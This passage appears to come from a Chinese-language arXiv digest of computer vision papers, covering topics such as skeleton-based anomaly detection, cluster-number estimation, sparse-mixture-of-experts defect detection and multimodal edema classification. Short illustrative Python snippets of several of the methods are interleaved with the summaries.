Abstract:As embodied perception systems increasingly bridge digital and physical realms in interactive multimedia applications, the need for privacy-preserving approaches to understand human activities in physical environments has become paramount. Video anomaly detection is a critical task in such embodied multimedia systems for intelligent surveillance and forensic analysis. Skeleton-based approaches have emerged as a privacy-preserving alternative that processes physical world information through abstract human pose representations while discarding sensitive visual attributes such as identity and facial features. However, existing skeleton-based methods predominantly model continuous motion trajectories in a monolithic manner, failing to capture the hierarchical nature of human activities composed of discrete semantic primitives and fine-grained kinematic details, which leads to reduced discriminability when anomalies manifest at different abstraction levels. In this regard, we propose Motion Semantics Guided Normalizing Flow (MSG-Flow) that decomposes skeleton-based VAD into hierarchical motion semantics modeling. It employs a vector quantized variational auto-encoder to discretize continuous motion into interpretable primitives, an autoregressive Transformer to model semantic-level temporal dependencies, and a conditional normalizing flow to capture detail-level pose variations. Extensive experiments on benchmarks (HR-ShanghaiTech and HR-UBnormal) demonstrate that MSG-Flow achieves state-of-the-art performance with 88.1% and 75.8% AUC, respectively.
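MSG-Flow 的第一阶段用 VQ-VAE 将连续运动离散化为动作基元,其核心是最近邻码本查询。以下为该量化步骤的假设性 numpy 草图(码本构造仅为演示,非论文实现):

```python
import numpy as np

def vq_quantize(z, codebook):
    """z: (n, d) 连续运动特征; codebook: (K, d) 码本 -> (离散索引, 量化后向量)"""
    d2 = ((z[:, None, :] - codebook[None, :, :]) ** 2).sum(-1)  # 到各码字的平方距离
    idx = d2.argmin(1)                                           # 最近邻码字索引,即"动作基元"
    return idx, codebook[idx]

# 演示:8 个 4 维码字,行间距离足够大;输入为码字 2、5 加小扰动
codebook = np.arange(8, dtype=float)[:, None] * np.ones((8, 4))
z = codebook[[2, 5]] + 0.1
idx, zq = vq_quantize(z, codebook)
# idx == [2, 5]:连续姿态序列被映射为可解释的离散符号
```

得到的离散索引序列即可交给自回归 Transformer 建模语义层级的时间依赖。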
[CV-290] CNMBI: Determining the Number of Clusters Using Center Pairwise Matching and Boundary Filtering
【速读】:该论文旨在解决无监督聚类中如何在缺乏先验信息的情况下自动确定最优簇数(cluster number)的问题。传统方法通常依赖于聚类有效性指标(validity index),并假设数据服从特定分布,这限制了其在高维、大规模真实数据(如图像数据)中的适用性。解决方案的关键在于提出一种名为CNMBI的新方法:它不依赖完整的聚类结果或复杂的有效性指数设计,而是将问题建模为簇中心之间基于位置行为的动态比较过程,并利用二分图(bipartite graph)理论高效建模该过程;同时首次引入样本置信度机制,主动剔除低置信度样本,从而提升簇数判定的鲁棒性和灵活性。
链接: https://arxiv.org/abs/2603.26744
作者: Ruilin Zhang,Haiyang Zheng,Hongpeng Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:One of the main challenges in data mining is choosing the optimal number of clusters without prior information. Notably, existing methods are usually in the philosophy of cluster validation and hence have underlying assumptions on data distribution, which prevents their application to complex data such as large-scale images and high-dimensional data from the real world. In this regard, we propose an approach named CNMBI. Leveraging the distribution information inherent in the data space, we map the target task as a dynamic comparison process between cluster centers regarding positional behavior, without relying on the complete clustering results and designing the complex validity index as before. Bipartite graph theory is then employed to efficiently model this process. Additionally, we find that different samples have different confidence levels and thereby actively remove low-confidence ones, which is, for the first time to our knowledge, considered in cluster number determination. CNMBI is robust and allows for more flexibility in the dimension and shape of the target data (e.g., CIFAR-10 and STL-10). Extensive comparison studies with state-of-the-art competitors on various challenging datasets demonstrate the superiority of our method.
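CNMBI 将簇中心间基于位置行为的动态比较过程用二分图建模。以下用纯 Python 的穷举最小代价完全匹配来示意"中心成对匹配"的思想(仅适用于小规模演示;论文采用的具体建图与求解方式以原文为准):

```python
import itertools

def best_center_matching(centers_a, centers_b):
    """二分图最小代价完全匹配:为 centers_a 中每个中心找到 centers_b 中的配对(小规模穷举示意)"""
    def d2(p, q):
        return sum((x - y) ** 2 for x, y in zip(p, q))
    best, best_cost = None, float("inf")
    for perm in itertools.permutations(range(len(centers_b))):
        cost = sum(d2(centers_a[i], centers_b[j]) for i, j in enumerate(perm))
        if cost < best_cost:
            best, best_cost = perm, cost
    return list(best), best_cost

# 虚构的两组聚类中心:b 是 a 的轻微扰动且顺序被打乱
a = [(0.0, 0.0), (5.0, 5.0), (0.0, 5.0)]
b = [(5.1, 4.9), (0.1, 5.2), (0.2, -0.1)]
match, cost = best_center_matching(a, b)
# match == [2, 0, 1]:a[0]->b[2], a[1]->b[0], a[2]->b[1]
```

匹配代价的大小可作为两种划分"位置行为"是否一致的信号;实际规模下应改用匈牙利算法等多项式时间求解器。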
[CV-291] Steering Sparse Autoencoder Latents to Control Dynamic Head Pruning in Vision Transformers (Student Abstract) AAAI2026
【速读】:该论文旨在解决视觉 Transformer (Vision Transformers, ViTs) 中动态注意力头剪枝(dynamic head pruning)效率与可解释性难以兼顾的问题。现有剪枝策略通常缺乏明确的控制机制,导致剪枝过程不可控且难以理解。其解决方案的关键在于引入稀疏自编码器(Sparse Autoencoders, SAEs),通过在 ViT 最终层残差嵌入上训练 SAE,将密集特征解耦为可解释且可控的稀疏潜在变量(sparse latents)。进一步地,通过对不同稀疏潜在变量采用差异化增强策略,实现对剪枝决策的类特定调控;例如,类别导向的“steering”方法能识别出仅使用少数几个注意力头(如 h2 和 h5)即可维持甚至提升准确率(如碗类从 76% 提升至 82%),同时显著降低头使用比例(从 0.72 降至 0.33)。这表明,稀疏潜在特征能够实现对动态剪枝的精细化控制,有效连接剪枝效率与机制可解释性。
链接: https://arxiv.org/abs/2603.26743
作者: Yousung Lee,Dongsoo Har
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 3 pages, 5 figures. Accepted as AAAI 2026 Student Abstract. Includes additional appendix with extended analysis
Abstract:Dynamic head pruning in Vision Transformers (ViTs) improves efficiency by removing redundant attention heads, but existing pruning policies are often difficult to interpret and control. In this work, we propose a novel framework by integrating Sparse Autoencoders (SAEs) with dynamic pruning, leveraging their ability to disentangle dense embeddings into interpretable and controllable sparse latents. Specifically, we train an SAE on the final-layer residual embedding of the ViT and amplify the sparse latents with different strategies to alter pruning decisions. Among them, per-class steering reveals compact, class-specific head subsets that preserve accuracy. For example, bowl improves accuracy (76% to 82%) while reducing head usage (0.72 to 0.33) via heads h2 and h5. These results show that sparse latent features enable class-specific control of dynamic pruning, effectively bridging pruning efficiency and mechanistic interpretability in ViTs.
[CV-292] Language-Conditioned World Modeling for Visual Navigation
【速读】:该论文旨在解决语言条件视觉导航(Language-Conditioned Visual Navigation, LCVN)中的接地问题,即在仅依赖初始视角观测的情况下,让具身智能体根据自然语言指令完成连续控制任务,而无法访问目标图像。核心挑战在于如何利用语言信息引导感知与动作决策,从而实现对环境的准确理解与导航。解决方案的关键在于将LCVN建模为基于语言指令的开环轨迹预测问题,并构建了一个包含39,016条轨迹和117,048条人工验证指令的大规模基准数据集(LCVN Dataset),支持可复现的研究。在此基础上,提出两类互补的框架:一是结合扩散世界模型(LCVN-WM)与基于潜在空间训练的Actor-Critic代理(LCVN-AC),强调时序一致性;二是采用自回归多模态架构(LCVN-Uni),联合预测动作与未来观测,提升对未见环境的泛化能力。这两类方法共同揭示了语言接地、想象(imagination)与策略学习在统一任务设定下的协同价值。
链接: https://arxiv.org/abs/2603.26741
作者: Yifei Dong,Fengyi Wu,Yilong Dai,Lingdong Kong,Guangyu Chen,Xu Zhu,Qiyu Hu,Tianyu Wang,Johnalbert Garnica,Feng Liu,Siyu Huang,Qi Dai,Zhi-Qi Cheng
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Robotics (cs.RO)
备注: 19 pages, 6 figures, Code: this https URL
Abstract:We study language-conditioned visual navigation (LCVN), in which an embodied agent is asked to follow a natural language instruction based only on an initial egocentric observation. Without access to goal images, the agent must rely on language to shape its perception and continuous control, making the grounding problem particularly challenging. We formulate this problem as open-loop trajectory prediction conditioned on linguistic instructions and introduce the LCVN Dataset, a benchmark of 39,016 trajectories and 117,048 human-verified instructions that supports reproducible research across a range of environments and instruction styles. Using this dataset, we develop LCVN frameworks that link language grounding, future-state prediction, and action generation through two complementary model families. The first family combines LCVN-WM, a diffusion-based world model, with LCVN-AC, an actor-critic agent trained in the latent space of the world model. The second family, LCVN-Uni, adopts an autoregressive multimodal architecture that predicts both actions and future observations. Experiments show that these families offer different advantages: the former provides more temporally coherent rollouts, whereas the latter generalizes better to unseen environments. Taken together, these observations point to the value of jointly studying language grounding, imagination, and policy learning in a unified task setting, and LCVN provides a concrete basis for further investigation of language-conditioned world models. The code is available at this https URL.
[CV-293] Beyond Static Visual Tokens: Structured Sequential Visual Chain-of-Thought Reasoning
【速读】:该论文旨在解决当前多模态大语言模型(Multimodal Large Language Models, MLLMs)在视觉推理中依赖静态视觉前缀和文本驱动推理、缺乏目标导向与自适应视觉访问的问题。其解决方案的关键在于提出结构化顺序视觉思维链(Structural Sequential Visual Chain-of-Thought, SSV-CoT),通过问题相关的显著性图(saliency map)识别并组织关键视觉区域,显式建模视觉重要性的空间分布;随后按照此判别性顺序进行推理,引导从主要线索到次要线索的课程式语义进展,从而实现端到端训练下的结构化和顺序性视觉认知。
链接: https://arxiv.org/abs/2603.26737
作者: Guangfu Guo,Xiaoqian Lu,Yue Feng,Mingming Sun
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Current multimodal LLMs encode images as static visual prefixes and rely on text-based reasoning, lacking goal-driven and adaptive visual access. Inspired by human visual perception, where attention is selectively and sequentially shifted from the most informative regions to secondary cues, we propose Structural Sequential Visual CoT (SSV-CoT). First, a question-relevant saliency map identifies and organizes key visual regions, explicitly modeling the spatial distribution of visual importance. Second, reasoning is performed following this discriminative order, inducing a curriculum-like semantic progression from primary to secondary cues. This method is trained end-to-end using text CoT and answer supervision, without relying on region-level annotations or specialized external tools. Experiments on diverse visual reasoning benchmarks show gains, validating structured and sequential visual cognition.
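SSV-CoT 按问题相关显著性对视觉区域排序,再从主线索到次线索依次推理。该排序步骤可以用如下极简草图表示(区域与分数均为虚构示例):

```python
def saliency_order(regions, saliency):
    """按问题相关显著性从高到低排序视觉区域,得到推理的访问顺序(示意)"""
    order = sorted(range(len(regions)), key=lambda i: -saliency[i])
    return [regions[i] for i in order]

# 假设显著性图已对每个候选区域给出分数
regions = ["背景", "手部", "目标物体", "路牌"]
saliency = [0.05, 0.6, 0.9, 0.3]
seq = saliency_order(regions, saliency)
# seq == ['目标物体', '手部', '路牌', '背景']:先主线索、后次线索的课程式顺序
```

随后模型按此顺序逐区域生成推理文本,形成"结构化、顺序性"的视觉思维链。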
[CV-294] Ordinal Semantic Segmentation Applied to Medical and Odontological Images
【速读】:该论文旨在解决当前深度学习方法在语义分割(Semantic Segmentation)任务中忽略类别间序关系(Ordinal Relationships)的问题,这种忽略可能导致分割结果缺乏语义一致性,从而影响场景的全局理解。解决方案的关键在于引入三类新型损失函数:单峰型(Unimodal)、准单峰型(Quasi-Unimodal)和空间型(Spatial)损失,它们通过建模类别排序信息来增强预测概率分布的有序性,并在相邻像素间施加一致性约束,从而提升分割结果的语义合理性与解剖学一致性。其中,Expanded Mean Squared Error (EXP_MSE)、Quasi-Unimodal Loss (QUL) 和基于信号距离函数的空间接触面损失(CSSDF)被特别验证在医学图像分割中具有良好的鲁棒性和泛化能力。
链接: https://arxiv.org/abs/2603.26736
作者: Mariana Dória Prata Lima,Gilson Antonio Giraldi,Jaime S. Cardoso
机构: LNCC (National Laboratory for Scientific Computing); INESC TEC (Institute for Systems and Computer Engineering, Technology and Science)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: 23 pages, 1 figure
Abstract:Semantic segmentation consists of assigning a semantic label to each pixel according to predefined classes. This process facilitates the understanding of object appearance and spatial relationships, playing an important role in the global interpretation of image content. Although modern deep learning approaches achieve high accuracy, they often ignore ordinal relationships among classes, which may encode important domain knowledge for scene interpretation. In this work, loss functions that incorporate ordinal relationships into deep neural networks are investigated to promote greater semantic consistency in semantic segmentation tasks. These loss functions are categorized as unimodal, quasi-unimodal, and spatial. Unimodal losses constrain the predicted probability distribution according to the class ordering, while quasi-unimodal losses relax this constraint by allowing small variations while preserving ordinal coherence. Spatial losses penalize semantic inconsistencies between neighboring pixels, encouraging smoother transitions in the image space. In particular, this study adapts loss functions originally proposed for ordinal classification to ordinal semantic segmentation. Among them, the Expanded Mean Squared Error (EXP_MSE), the Quasi-Unimodal Loss (QUL), and the spatial Contact Surface Loss using Signal Distance Function (CSSDF) are investigated. These approaches have shown promising results in medical imaging, improving robustness, generalization, and anatomical consistency.
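对于有序类别,单峰型损失的一种常见形式是对预测分布计算到真类的期望平方距离,从而惩罚把概率质量分到序距离远的类。以下为该思想的最小示意(并非论文中 EXP_MSE 的精确定义,仅作直觉演示):

```python
def ordinal_mse_loss(probs, y):
    """期望平方序误差:sum_k p_k * (k - y)^2,鼓励概率在真类附近单峰集中(示意)"""
    return sum(p * (k - y) ** 2 for k, p in enumerate(probs))

# 真类 y=1;单峰分布 vs 概率分散到序距离远的类
peaked = [0.05, 0.8, 0.1, 0.05]
spread = [0.4, 0.1, 0.1, 0.4]
loss_peaked = ordinal_mse_loss(peaked, 1)   # 0.35
loss_spread = ordinal_mse_loss(spread, 1)   # 2.1
```

可以看到,即便两种分布对真类的概率差异不大,序距离远的错误类会被平方距离显著放大,这正是序一致性约束想要的行为;空间型损失则在相邻像素之间施加类似的有序惩罚。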
[CV-295] Distilled Large Language Model-Driven Dynamic Sparse Expert Activation Mechanism
【速读】:该论文旨在解决视觉识别中因类别间相似性高、尺度变化极端以及计算资源有限而导致的可靠性下降问题,尤其针对工业缺陷检测场景中的跨类别模糊性和实时性挑战。其解决方案的关键在于提出一种基于蒸馏大语言模型(Distilled Large Language Model, LLM)驱动的稀疏专家混合模型(Distilled Large Language Model-Driven Sparse Mixture-of-Experts, DS-MoE),通过文本引导的动态路由机制实现语义与视觉特征的自适应对齐,并结合轻量级多尺度理解模块(MobileSAM编码器)提升推理效率与细节保留能力,从而在不依赖复杂标注流程的前提下显著增强模型泛化性能。
链接: https://arxiv.org/abs/2603.26735
作者: Qinghui Chen,Zekai Zhang,Zaigui Zhang,Kai Zhang,Dagang Li,Wenmin Wang,Jinglin Zhang,Cong Liu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:High inter-class similarity, extreme scale variation, and limited computational budgets hinder reliable visual recognition across diverse real-world data. Existing vision-centric and cross-modal approaches often rely on rigid fusion mechanisms and heavy annotation pipelines, leading to sub-optimal generalization. We propose the Distilled Large Language Model (LLM)-Driven Sparse Mixture-of-Experts (DS-MoE) framework, which integrates text-guided dynamic routing and lightweight multi-scale comprehension. The DS-MoE framework dynamically aligns textual semantics with defect-specific visual patterns through a sparse MoE architecture, where task-relevant experts are adaptively activated based on semantic relevance, resolving inter-class ambiguity. A lightweight MobileSAM encoder enables real-time inference while preserving multi-scale defect details. Extensive experiments on PCB, aluminum foil, and mold defect datasets demonstrate that our framework achieves superior performance compared to existing pure vision models. DS-MoE surpasses YOLOv8/YOLOX with gains of +13.9, +1.4, and +2.0 pp mAP@0.5:0.95 on BBMP, aluminum, and PCB, respectively, while also improving precision and recall.
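DS-MoE 的稀疏路由思想可以用经典的 top-k 门控来示意:按语义相关性为各专家打分,只激活得分最高的 k 个专家并做 softmax 加权求和。以下 numpy 草图中的门控矩阵与专家函数均为假设,并非论文官方实现:

```python
import numpy as np

def sparse_moe(x, gate_w, experts, k=2):
    """稀疏专家混合的 top-k 路由:仅激活得分最高的 k 个专家(示意)"""
    logits = x @ gate_w                       # 每个专家的相关性分数
    top = np.argsort(logits)[-k:]             # 选出 top-k 专家
    w = np.exp(logits[top] - logits[top].max())
    w = w / w.sum()                           # 被激活专家上的 softmax 权重
    return sum(wi * experts[i](x) for wi, i in zip(w, top))

x = np.ones(4)                                # 假设的融合特征
gate_w = np.array([[0.0, 0.5, 0.5],
                   [0.0, 0.5, 0.5],
                   [0.0, 0.5, 0.5],
                   [0.0, 0.5, 0.5]])          # 门控权重,使 logits = [0, 2, 2]
experts = [lambda v: v + 0.0, lambda v: v + 1.0, lambda v: v + 2.0]
out = sparse_moe(x, gate_w, experts, k=2)     # 激活专家 1、2,各占 0.5 权重
```

计算量只随被激活的 k 个专家增长,这正是稀疏 MoE 在实时缺陷检测场景下节省算力的来源;DS-MoE 中的门控分数由文本语义引导,细节以原文为准。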
[CV-296] Contextual inference from single objects in Vision-Language models
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)中单个物体所携带的场景上下文信息如何组织的问题,这一问题对模型鲁棒性具有直接意义。解决方案的关键在于通过系统的行为实验与机制分析,发现单个物体在遮蔽背景条件下仍能支持细粒度场景类别和粗粒度超类场景(室内/室外)的高于随机水平的推断,且其性能受与人类场景分类一致的物体属性调节;进一步揭示出物体表征在去除背景后保持稳定时更有利于成功的情境推理,同时发现场景身份信息贯穿网络各层以图像标记形式编码,而超类信息仅在后期或根本不出现,表明两种场景语义的表征机制存在本质差异。
链接: https://arxiv.org/abs/2603.26731
作者: Martina G. Vilas,Timothy Schaumlöffel,Gemma Roig
机构: Goethe University Frankfurt (歌德大学法兰克福); The Hessian Center for AI (黑森州人工智能中心)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:How much scene context a single object carries is a well-studied question in human scene perception, yet how this capacity is organized in vision-language models (VLMs) remains poorly understood, with direct implications for the robustness of these models. We investigate this question through a systematic behavioral and mechanistic analysis of contextual inference from single objects. Presenting VLMs with single objects on masked backgrounds, we probe their ability to infer both fine-grained scene category and coarse superordinate context (indoor vs. outdoor). We found that single objects support above-chance inference at both levels, with performance modulated by the same object properties that predict human scene categorization. Object identity, scene, and superordinate predictions are partially dissociable: accurate inference at one level neither requires nor guarantees accurate inference at the others, and the degree of coupling differs markedly across models. Mechanistically, object representations that remain stable when background context is removed are more predictive of successful contextual inference. Scene and superordinate schemas are grounded in fundamentally different ways: scene identity is encoded in image tokens throughout the network, while superordinate information emerges only late or not at all. Together, these results reveal that the organization of contextual inference in VLMs is more complex than accuracy alone suggests, with behavioral and mechanistic signatures.
[CV-297] Multi-view Graph Convolutional Network with Fully Leveraging Consistency via Granular-ball-based Topology Construction, Feature Enhancement and Interactive Fusion
【速读】:该论文旨在解决现有基于图卷积网络(Graph Convolutional Network, GCN)的多视图学习方法在利用三类一致性(节点间一致性、特征间一致性与视图间一致性)方面的局限性问题。具体而言,传统方法依赖KNN构建拓扑结构导致k值选择主观性强,难以有效捕捉节点间一致性;忽视单视图内的特征间一致性,影响嵌入表示质量;且视图融合通常在各视图独立进行图卷积后执行,未能充分挖掘视图间的交互一致性。解决方案的关键在于提出MGCN-FLC模型,通过三个核心模块实现对三类一致性的全面利用:基于粒球算法(Granular Ball, GB)的拓扑构建模块以高内聚方式聚类节点来增强节点间一致性;特征增强模块通过建模特征间一致性提升局部表示能力;交互融合模块则促使各视图深度协同,从而获得更全面的视图间一致性,显著提升了多视图表征学习效果。
链接: https://arxiv.org/abs/2603.26729
作者: Chengjie Cui,Taihua Xua,Shuyin Xia,Qinghua Zhang,Yun Cui,Shiping Wang
机构: Jiangsu University of Science and Technology (江苏科技大学); Chongqing University of Posts and Telecommunications (重庆邮电大学); Fuzhou University (福州大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The effective utilization of consistency is crucial for multi-view learning. GCNs leverage node connections to propagate information across the graph, facilitating the exploitation of consistency in multi-view data. However, most existing GCN-based multi-view methods suffer from several limitations. First, current approaches predominantly rely on KNN for topology construction, where the artificial selection of the k value significantly constrains the effective exploitation of inter-node consistency. Second, the inter-feature consistency within individual views is often overlooked, which adversely affects the quality of the final embedding representations. Moreover, these methods fail to fully utilize inter-view consistency, as the fusion of embedded representations from multiple views is often implemented after the intra-view graph convolutional operation. Collectively, these issues limit the model’s capacity to fully capture inter-node, inter-feature and inter-view consistency. To address these issues, this paper proposes the multi-view graph convolutional network with fully leveraging consistency via GB-based topology construction, feature enhancement and interactive fusion (MGCN-FLC). MGCN-FLC can fully utilize the three types of consistency via the following three modules to enhance learning ability: the topology construction module based on the granular ball algorithm, which clusters nodes into granular balls with high internal similarity to capture inter-node consistency; the feature enhancement module that improves feature representations by capturing inter-feature consistency; and the interactive fusion module that enables each view to deeply interact with all other views, thereby obtaining more comprehensive inter-view consistency. Experimental results on nine datasets show that the proposed MGCN-FLC outperforms state-of-the-art semi-supervised node classification methods.
[CV-298] The Nonverbal Gap: Toward Affective Computer Vision for Safer and More Equitable Online Dating
【速读】:该论文旨在解决在线约会平台因缺乏非语言线索(如目光接触、面部表情、身体姿态和反应时间)而导致的沟通鸿沟问题,这一鸿沟对女性造成不成比例的安全风险。解决方案的关键在于提出一个以公平性优先的研究议程,涵盖四个核心能力领域:实时不适检测、伴侣间参与度不对称建模、知情同意交互设计以及纵向互动摘要生成,均基于成熟的计算机视觉(Computer Vision, CV)方法,并结合浪漫关系中的社会心理学机制。该议程强调必须构建在双人知情同意协议下采集的专用数据集、跨种族、性别身份、神经多样性及文化背景的公平性评估,以及承诺本地化处理架构以防止情感数据被平台用于监控基础设施,从而推动将在线约会安全确立为首个值得重视的研究领域。
链接: https://arxiv.org/abs/2603.26727
作者: Ratna Kandala,Niva Manchanda,Akshata Kishore Moharir
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Online dating has become the dominant way romantic relationships begin, yet current platforms strip the nonverbal cues: gaze, facial expression, body posture, response timing, that humans rely on to signal comfort, disinterest, and consent, creating a communication gap with disproportionate safety consequences for women. We argue that this gap represents both a technical opportunity and a moral responsibility for the computer vision community, which has developed the affective tools, facial action unit detection, gaze estimation, engagement modeling, and multimodal affect recognition, needed to begin addressing it, yet has largely ignored the dating domain as a research context. We propose a fairness-first research agenda organized around four capability areas: real-time discomfort detection, engagement asymmetry modeling between partners, consent-aware interaction design, and longitudinal interaction summarization, each grounded in established CV methodology and motivated by the social psychology of romantic communication. We argue that responsible pursuit of this agenda requires purpose-built datasets collected under dyadic consent protocols, fairness evaluation disaggregated across race, gender identity, neurotype, and cultural background, and architectural commitments to on-device processing that prevent affective data from becoming platform surveillance infrastructure. This vision paper calls on the WICV community, whose members are uniquely positioned to understand both the technical opportunity and the human stakes, to establish online dating safety as a first-class research domain before commercial deployment outpaces ethical deliberation.
[CV-299] A Multimodal Deep Learning Framework for Edema Classification Using HCT and Clinical Data
【速读】:该论文旨在解决脑水肿(brain edema)多模态检测中如何有效融合结构化头部CT(HCT)影像与常规临床元数据(clinical metadata)的问题。现有方法常忽视两者间的互补性,或采用简单拼接策略,导致信息利用不充分且缺乏可解释性。其解决方案的关键在于提出AttentionMixer框架:首先使用自监督视觉Transformer自动编码器(ViT-AE++)对HCT进行无监督特征提取;随后将临床元数据映射至相同特征空间,并作为交叉注意力(cross-attention)模块中的keys和values,以HCT特征向量为queries实现动态调制;最后通过轻量级MLP-Mixer进一步优化融合表示,兼顾全局依赖建模与参数效率。该设计实现了结构化、可解释的多模态融合,在真实临床数据下表现出高鲁棒性和优越性能。
链接: https://arxiv.org/abs/2603.26726
作者: Aram Ansary Ogholbake,Hannah Choi,Spencer Brandenburg,Alyssa Antuna,Zahraa Al-Sharshahi,Makayla Cox,Haseeb Ahmed,Jacqueline Frank,Nathan Millson,Luke Bauerle,Jessica Lee,David Dornbos III,Qiang Cheng
机构: University of Kentucky (肯塔基大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:We propose AttentionMixer, a unified deep learning framework for multimodal detection of brain edema that combines structural head CT (HCT) with routine clinical metadata. While HCT provides rich spatial information, clinical variables such as age, laboratory values, and scan timing capture complementary context that might otherwise be ignored or naively concatenated. AttentionMixer is designed to fuse these heterogeneous sources in a principled and efficient manner. HCT volumes are first encoded using a self-supervised Vision Transformer Autoencoder (ViT-AE++), without requiring large labeled datasets. Clinical metadata are mapped into the same feature space and used as keys and values in a cross-attention module, where HCT-derived feature vectors serve as queries. This cross-attention fusion allows the network to dynamically modulate imaging features based on patient-specific context and provides an interpretable mechanism for multimodal integration. A lightweight MLP-Mixer then refines the fused representation before final classification, enabling global dependency modeling with substantially reduced parameter overhead. Missing or incomplete metadata are handled via a learnable embedding, promoting robustness to real-world clinical data quality. We evaluate AttentionMixer on a curated brain HCT cohort with expert edema annotations using five-fold cross-validation. Compared with strong HCT-only, metadata-only, and prior multimodal baselines, AttentionMixer achieves superior performance (accuracy 87.32%, precision 92.10%, F1-score 85.37%, AUC 94.14%). Ablation studies confirm the benefit of both cross-attention and MLP-Mixer refinement, and permutation-based metadata importance analysis highlights clinically meaningful variables driving predictions. These results demonstrate that structured, interpretable multimodal fusion can substantially improve edema detection in clinical practice.
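AttentionMixer 的融合核心是以 HCT 特征为 query、临床元数据嵌入为 key/value 的交叉注意力。以下为单头缩放点积注意力的假设性 numpy 草图(投影矩阵用单位阵代替,仅示意数据流,非论文实现):

```python
import numpy as np

def cross_attention(img_feat, meta_emb, wq, wk, wv):
    """img_feat: (1, d) HCT 特征作 query; meta_emb: (m, d) 元数据嵌入作 key/value"""
    Q = img_feat @ wq
    K = meta_emb @ wk
    V = meta_emb @ wv
    scores = (Q @ K.T) / np.sqrt(Q.shape[-1])   # 缩放点积
    attn = np.exp(scores - scores.max())
    attn = attn / attn.sum()                    # 对 m 条元数据的注意力权重
    return attn @ V, attn                       # 经元数据调制后的影像特征

d = 4
rng = np.random.default_rng(0)
img_feat = rng.normal(size=(1, d))   # 假设:HCT 经 ViT-AE++ 编码后的特征
meta_emb = rng.normal(size=(3, d))   # 假设:年龄、化验值、扫描时间等的嵌入
fused, attn = cross_attention(img_feat, meta_emb, np.eye(d), np.eye(d), np.eye(d))
```

注意力权重 `attn` 本身即可解释:它显示了哪条临床变量对当前影像特征的调制最强,这与论文强调的可解释融合机制相呼应。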
[CV-300] An Annotation-to-Detection Framework for Autonomous and Robust Vine Trunk Localization in the Field by Mobile Agricultural Robots
【速读】:该论文旨在解决农业环境中对象检测与定位的挑战,特别是针对自主移动机器人在未见过的非结构化场景中进行高效、实时检测的需求,同时避免依赖大规模人工标注的真实世界数据集。其核心解决方案是提出一个端到端的“注释到检测”(annotation-to-detection)框架,关键在于结合跨模态注释迁移(cross-modal annotation transfer)和早期传感器融合(early-stage sensor fusion)策略,并通过多阶段检测架构实现增量式训练与性能提升。该方法显著提升了模型在有限且部分标注数据下的多模态感知能力,在不同光照条件和作物密度下实现了高精度的葡萄藤主干定位(平均距离误差<0.37m,单次遍历识别率>70%),验证了其在近地农业场景中的鲁棒性和实用性。
链接: https://arxiv.org/abs/2603.26724
作者: Dimitrios Chatziparaschis,Elia Scudiero,Brent Sams,Konstantinos Karydis
机构: University of California, Riverside (加州大学河滨分校); Gallo (加洛)
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注: 7 pages, 6 figures, conference
Abstract:The dynamic and heterogeneous nature of agricultural fields presents significant challenges for object detection and localization, particularly for autonomous mobile robots that are tasked with surveying previously unseen unstructured environments. Concurrently, there is a growing need for real-time detection systems that do not depend on large-scale manually labeled real-world datasets. In this work, we introduce a comprehensive annotation-to-detection framework designed to train a robust multi-modal detector using limited and partially labeled training data. The proposed methodology incorporates cross-modal annotation transfer and an early-stage sensor fusion pipeline, which, in conjunction with a multi-stage detection architecture, effectively trains and enhances the system’s multi-modal detection capabilities. The effectiveness of the framework was demonstrated through vine trunk detection in novel vineyard settings that featured diverse lighting conditions and varying crop densities to validate performance. When integrated with a customized multi-modal LiDAR and Odometry Mapping (LOAM) algorithm and a tree association module, the system demonstrated high-performance trunk localization, successfully identifying over 70% of trees in a single traversal with a mean distance error of less than 0.37m. The results reveal that by leveraging multi-modal, incremental-stage annotation and training, the proposed framework achieves robust detection performance regardless of limited starting annotations, showcasing its potential for real-world and near-ground agricultural applications.
[CV-301] Deep Learning Multi-Horizon Irradiance Nowcasting: A Comparative Evaluation of Three Methods for Leveraging Sky Images
【速读】:该论文旨在解决如何有效将全天域成像仪(All-Sky Imager, ASI)图像融入深度学习(Deep Learning, DL)模型以提升全局水平辐照度(Global Horizontal Irradiance, GHI)短临预报精度的问题。其关键解决方案在于提出三种不同的特征处理策略:直接使用卷积神经网络(CNN)从原始RGB图像中提取特征、基于领域知识(如云分割、云运动矢量、太阳位置和云底高度)构建二维特征图后输入CNN进行复合特征提取,以及将工程化二维特征图聚合为时间序列输入。实验表明,第三种方法——以聚合后的工程特征作为模型输入——表现最优,证明了无需复杂空间有序的DL架构即可实现ASI图像的有效融合,凸显了替代性图像处理方法及改进的空间特征处理潜力。
链接: https://arxiv.org/abs/2603.26704
作者: Erling W. Eriksen,Magnus M. Nygård,Niklas Erdmann,Heine N. Riise
机构: Institute for Energy Technology (能源技术研究所); University of Oslo Department of Technology Systems (奥斯陆大学技术系统系)
类目: Systems and Control (eess.SY); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV)
备注:
